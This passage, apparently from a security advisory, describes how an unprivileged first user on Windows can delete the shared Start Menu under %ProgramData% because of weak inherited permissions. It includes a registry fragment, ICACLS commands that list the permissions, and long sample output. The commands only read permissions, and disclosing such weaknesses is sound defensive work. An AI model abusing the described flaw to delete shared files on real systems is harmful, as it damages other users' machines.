".psd1"="Microsoft.PowerShellData.1"
".psm1"="Microsoft.PowerShellModule.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSTSC.exe,-1004"
"ApplicationName"="@C:\\Windows\\System32\\MSTSC.exe,-1004"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client\Capabilities\FileAssociations]
".rdp"="RDP.File"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\RegEdit\Capabilities]
"ApplicationDescription"="@C:\\Windows\\RegEdit.exe,-16"
"ApplicationName"="@C:\\Windows\\RegEdit.exe,-16"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\RegEdit\Capabilities\FileAssociations]
".reg"="regfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Compressed Folder\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\ZipFldr.dll,-10133"
"ApplicationName"="@C:\\Windows\\System32\\ZipFldr.dll,-10133"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Compressed Folder\Capabilities\FileAssociations]
".zip"="CompressedFolder"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Capabilities]
"ApplicationDescription"="C:\\Windows\\System32\\Control.exe,-1"
"ApplicationName"="C:\\Windows\\System32\\Control.exe,-1"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Capabilities\FileAssociations]
".cpl"="cplfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSIMsg.dll,-27"
"ApplicationName"="@C:\\Windows\\System32\\MSIMsg.dll,-28"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Capabilities\FileAssociations]
".msi"="MSI.Package"
".msp"="MSI.Patch"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\WScript.exe,-1"
"ApplicationName"="@C:\\Windows\\System32\\WScript.exe,-1"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Capabilities\FileAssociations]
".js"="jsfile"
".jse"="jsefile"
".vbe"="vbefile"
".vbs"="vbsfile"
".wsf"="wsffile"
".wsh"="wshfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Update Standalone Installer\Capabilities]
"ApplicationDescription"="Windows Update Standalone Installer"
"ApplicationName"="Windows Update Standalone Installer"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Update Standalone Installer\Capabilities\FileAssociations]
".msu"="Microsoft.System.Update.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
"Command Processor"="SOFTWARE\\Microsoft\\Command Processor\\Capabilities"
"Compressed Folder"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Compressed Folder\\Capabilities"
"Control Panel"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Capabilities"
"HTMLHelp"="SOFTWARE\\Microsoft\\HTMLHelp\\Capabilities"
"IExpress Wizard"="SOFTWARE\\Microsoft\\IExpress Wizard\\Capabilities"
"INF Default Install Application"="SOFTWARE\\Microsoft\\INF Default Install Application\\Capabilities"
"Microsoft HTML Application Host"="SOFTWARE\\Microsoft\\Microsoft HTML Application Host\\Capabilities"
"Microsoft Management Console"="SOFTWARE\\Microsoft\\Microsoft Management Console\\Capabilities"
"Microsoft PowerShell 1"="SOFTWARE\\Microsoft\\PowerShell\\1\\Capabilities"
"NotePad"="SOFTWARE\\Microsoft\\NotePad\\Capabilities"
"Registry Editor"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Applets\\RegEdit\\Capabilities"
"Terminal Server Client"="SOFTWARE\\Microsoft\\Terminal Server Client\\Capabilities"
"Windows Installer"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Capabilities"
"Windows Script Host"="SOFTWARE\\Microsoft\\Windows Script Host\\Capabilities"
"Windows Update Standalone Installer"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WUSA\\Capabilities" Double-click the file whisper.reg created in
step 1. to merge its entries into the
Registry.
%SystemDrive%\ProgramData\ alias
%ProgramData%\ and moved the directory with the shared
Start Menufrom its previous, properly protected location
%ALLUSERSPROFILE%\Start Menu\ to
%ProgramData%\Microsoft\Windows\Start Menu\.
Before this relocation only members of the
BUILTIN\Administrators group had
write and delete access to files and subdirectories beneath
%ALLUSERSPROFILE%\ and therefore the shared
Start Menu
too – afterwards the
DACL
of the directory
%ProgramData%\Microsoft\Windows\Start Menu\ contains
at least one inherit-only
ACE like
(A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000)
which grants the first local user account created during setup
DELETE and
FILE_DELETE_CHILD access to
all files and subdirectories underneath: since
almost 19 (in words: nineteen) years
at least one unprivileged user can
delete the shared Start Menu
completely, thus affecting
all (other) users of a machine!
Logon to the first user account created during Windows
setup and start the Command Processor
Cmd.exe
unelevated, then execute the following command
lines:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /Q ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*" /C /Q IF NOT DEFINED WHISPER ( ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /T | FIND.EXE "%USERDOMAIN%\%USERNAME%" ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /T | FIND.EXE "%USERDOMAIN%\%USERNAME%" ) ELSE ( ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /T | FINDSTR.EXE /B /C:"%ProgramData%" ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /T | FINDSTR.EXE /B /C:"%ProgramData%" )Note: the command lines can be copied and pasted as block into a Command Processor window.
Note: both branches of the
IF (…) ELSE (…) statement yield the same
output!
C:\ProgramData\Microsoft\Windows\Start Menu AMNESIAC\Stefan:(OI)(CI)(IO)(DE,DC) AMNESIAC\Administrator:(OI)(CI)(IO)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX) Successfully processed 1 files; Failed processing 0 files C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX) C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX) C:\ProgramData\Microsoft\Windows\Start Menu\Programs AMNESIAC\Stefan:(I)(OI)(CI)(DE,DC) AMNESIAC\Administrator:(I)(OI)(CI)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX) C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX) Successfully processed 4 files; Failed processing 0 files C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Calendar.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\DisplaySwitch.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Registry Editor.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Management.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\IIS Manager.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Microsoft .NET Framework 2.0 Configuration.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Scan Management.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Application Verifier\Application Verifier.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Application Verifier (x64)\Application Verifier (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Debugging Help.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Global Flags.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Uninstall Debugging Tools for Windows (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\WinDbg.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Debugging Help.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Global Flags.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Uninstall Debugging Tools for Windows (x86).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\WinDbg.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Samples Directory.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Samples Reference.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools Reference.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Windows SDK 7.1 Command Prompt.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Accessible Event Watcher (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\GUID Generator.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Inspect Objects (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Manifest_Generator (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\OLE-COM Object Viewer (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\WinDiff (x64).lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Windows Troubleshooting Pack Designer.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Visual Studio Registration\Windows SDK Configuration Tool.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\Virtual Machines.lnk AMNESIAC\Stefan:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\Virtual Windows XP.lnk AMNESIAC\Stefan:(I)(DE,DC)OUCH¹: on this installation of Windows 7 all subdirectories, shortcuts and
desktop.ini files of the shared
Start Menuare not properly protected – the unprivileged primary user is able to remove them all!
On Windows 10 and later versions of Windows NT run the following alternative command line instead:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)"
C:\ProgramData\Microsoft\Windows\Start Menu S-1-5-21-1717989741-1660040995-2455016376-1002:(OI)(CI)(IO)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(OI)(CI)(IO)(DE,DC) WHISPER\Administrator:(OI)(CI)(IO)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) 